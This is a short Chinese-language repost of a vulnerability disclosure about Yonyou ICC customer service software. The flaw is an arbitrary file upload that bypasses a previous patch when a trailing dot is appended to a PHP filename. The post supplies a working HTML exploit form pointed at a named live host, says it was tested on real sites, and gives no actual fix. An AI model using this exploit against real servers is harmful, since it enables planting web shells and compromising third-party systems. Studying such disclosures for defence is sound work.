好得很程序员自学网

<tfoot draggable='sEl'></tfoot>

再再暴用友ICC网站客服系统任意文件上传漏洞

再再暴用友ICC网站客服系统任意文件上传漏洞,看了一下上一个漏洞: http://www.2cto.com/Article/201206/136635.html ,发现可以饶过官方修复。 详细说明:测试多个网站均存在 漏洞 。   /home/ecccs/web/5107/upload/screenImagesSave.php   具体自己看 源码 这里直接给出利用代码。   <form enctype="multipart/form-data" method="post"   action="http://icc.5107.cn/5107/upload/screenImagesSave.php?filename=jpg.php.">   <input type="file" name="file"> <input type="submit" name="up" value="上传"> </form>   上一个是jpg.php 这个是只要在jpg.php后面加个.那么 上传后一样可以解析   http://www.2cto.com /xxx.php. 这样一样可以解析为php 的。   测试了: http://icc.5107.cn/     漏洞证明:http://icc.5107.cn/data/guige.txt         修复方案: 你们懂得! 作者 鬼哥

查看更多关于再再暴用友ICC网站客服系统任意文件上传漏洞的详细内容...

  阅读:41次